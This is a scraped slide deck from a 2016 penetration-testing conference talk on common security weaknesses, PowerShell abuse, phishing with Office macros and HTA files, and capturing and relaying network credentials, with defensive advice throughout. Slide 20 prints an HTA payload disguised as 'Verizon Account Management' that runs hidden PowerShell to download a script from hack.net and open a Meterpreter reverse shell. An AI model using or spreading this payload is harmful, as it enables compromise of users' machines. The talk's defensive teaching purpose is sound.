Download presentation
Presentation is loading. Please wait.
Published byMoris Miller Modified over 8 years ago
1
©2014 CliftonLarsonAllen LLP CLAconnect.com See CLA PowerPoint User Guide for instructions to insert an image or change the icon on the business card. Find it at the bottom of the myCLA / Firm Resources / Materials / Templates page. See CLA PowerPoint User Guide for instructions to insert an image or change the icon on the business card. Find it at the bottom of the myCLA / Firm Resources / Materials / Templates page. Lessons Learned from a Penetration Tester NASCUS 2016
2
©2014 CliftonLarsonAllen LLP Intro/Summary I am going to share with you: 1.whoami 2.Common security issues ◊ External ◊ Internal 3.PowerShell Overview 4.Popular attack vectors ◊ Phishing ◊ Internal network 5.Key defensive strategies
3
©2014 CliftonLarsonAllen LLP whoami David Anderson Farm kid turned hacker dude Worked in IT for 6 years Penetration tester for 4+ years Yes, I am older than 18
4
©2014 CliftonLarsonAllen LLP Common Issues The same thing….over and over….
5
©2014 CliftonLarsonAllen LLP Common Issues from External Perspective 1.Poor email filtering a)Ability to spoof internal email addresses b)Ability to send malicious attachments 2.Not implementing two-factor authentication a)Outlook Web App b)VPN 3.Lack of filtering on perimeter a)Domain whitelisting b)Egress filtering c)SSL/TLS inspection
6
©2014 CliftonLarsonAllen LLP Common Issues from Internal Perspective 1.Giving users local admin privileges 2.Sharing passwords/weak passwords a)Local admin account b)IT admins c)Service accounts 3.Weak/no encryption 4.Poor patching 5.End users a)Can we patch these???
7
©2014 CliftonLarsonAllen LLP PowerShell That’s one powerful shell…
8
©2014 CliftonLarsonAllen LLP PowerShell Windows scripting environment built on.NET Comes pre-installed –Attackers don’t have to worry about AV Able to perform many different tasks that command prompt couldn’t
9
©2014 CliftonLarsonAllen LLP PowerShell Search for systems where you have local administrator access Search for where domain administrators are logged in Can download items from a URL Can inject malicious code straight into memory
10
©2014 CliftonLarsonAllen LLP How to protect yourself Prevent standard users from executing PowerShell –Free Microsoft tools – AppLocker & Software Restriction Policies (SRP) Implement new PowerShell security features –Script Transcription –Script Block Logging Microsoft EMET to protect memory
11
©2014 CliftonLarsonAllen LLP Phishing Vectors Same ol’ tricks…..
12
©2014 CliftonLarsonAllen LLP Office Macros Macros allow attackers to access any applications/features that are installed or available on the user’s workstation Utilizing PowerShell, attackers can execute malicious code easily
13
©2014 CliftonLarsonAllen LLP Office Macros
14
©2014 CliftonLarsonAllen LLP Office Macros
15
©2014 CliftonLarsonAllen LLP Office Macros How to protect yourself… Use Group Policy to disable macros –Office 2016 has new security features Teach users who utilize Macros the dangers of opening unknown documents
16
©2014 CliftonLarsonAllen LLP Office Macros
17
©2014 CliftonLarsonAllen LLP.HTA Payloads HTA > HTML Applications Allows attacker to run malicious applications on end user’s system Needs to be opened with Internet Explorer.HTA files get launched by trusted Microsoft application - mshta.exe
18
©2014 CliftonLarsonAllen LLP.HTA Payloads
19
©2014 CliftonLarsonAllen LLP.HTA Payloads From Microsoft - HTAs not only support everything a webpage …—but also HTA–specific functionality. This added functionality provides control over user interface design and access to the client system. Moreover, run as trusted applications, HTAs are not subject to the same security constraints as webpages. The end result is that an HTA runs like any executable (.exe) file written in C++ or Visual Basic.”
20
©2014 CliftonLarsonAllen LLP.HTA Payloads Verizon Account Management Sub Initialize() Dim sCmd, iResult, sResultData, sMessage window.resizeTo 375,250 'Set command to call PowerShell script 'sCmd = "powershell.exe -nop -exec bypass -win hidden -command iex(New-Object Net.WebClient).DownloadString('https://hack.net/is');Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 11.22.33.44 -lport 443 -force" sCmd = "powershell.exe -nop -noni -exec bypass -win hidden -command iex(New-Object Net.WebClient).DownloadString('https://hack.net/is'); Invoke-Shellcode -payload windows/meterpreter/reverse_https - lhost 11.22.33.44 -lport 443 -force" 'Call PowerShell script Set oShell = CreateObject("Wscript.Shell") iResult = oShell.Run(sCmd, 0, true) 'Collect result from PowerShell (via clipboard) sResultData = window.clipboarddata.getdata("Text") End Sub
21
©2014 CliftonLarsonAllen LLP.HTA Payloads
22
©2014 CliftonLarsonAllen LLP.HTA Payloads
23
©2014 CliftonLarsonAllen LLP.HTA Payloads How to protect yourself… Block mshta.exe from running on systems Web filter/Content filter – block.hta extension
24
©2014 CliftonLarsonAllen LLP Internal Vectors Please give me your password…
25
©2014 CliftonLarsonAllen LLP Gathering network creds Attacks Windows Single Sign-On Starts by spoofing UDP traffic –NetBIOS traffic –LLMNR traffic Tricks computer into attempting to authenticate to the attacker The computer automatically sends encrypted credentials to attacker
26
©2014 CliftonLarsonAllen LLP Gathering network creds Metasploit has modules to perform this attack Attempt to crack weak passwords How we gain initial foothold on network 95% of the time
27
©2014 CliftonLarsonAllen LLP Gathering network creds SMB Capture in Metasploit Using John the Ripper to crack the password
28
©2014 CliftonLarsonAllen LLP Relaying network creds Instead of capture, we can relay Can be used to authenticate to alternate system or run malicious code on alternate system Need to have ADMIN privileges on target host
29
©2014 CliftonLarsonAllen LLP Relay network creds
30
©2014 CliftonLarsonAllen LLP How to protect yourself Enforce strong password requirements for ALL users –We can crack 8 character NTLM password in ~1 day –We can crack 8 character NetNTLMv2 password in ~11 days Enforce SMB Signing –This prevents man-in-the-middle attacks (stops relaying) Restrict admin rights
31
©2014 CliftonLarsonAllen LLP How to protect yourself
32
©2014 CliftonLarsonAllen LLP QUESTIONS
33
©2014 CliftonLarsonAllen LLP 33 ©2014 CliftonLarsonAllen LLP CLAconnect.com twitter.com/ CLAconnect facebook.com/ cliftonlarsonallen linkedin.com/company/ cliftonlarsonallen Thank you! David Anderson, OSCP Manager, Information Security, Direct: 612-376-4699 Email: david.anderson@claconnect.com
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.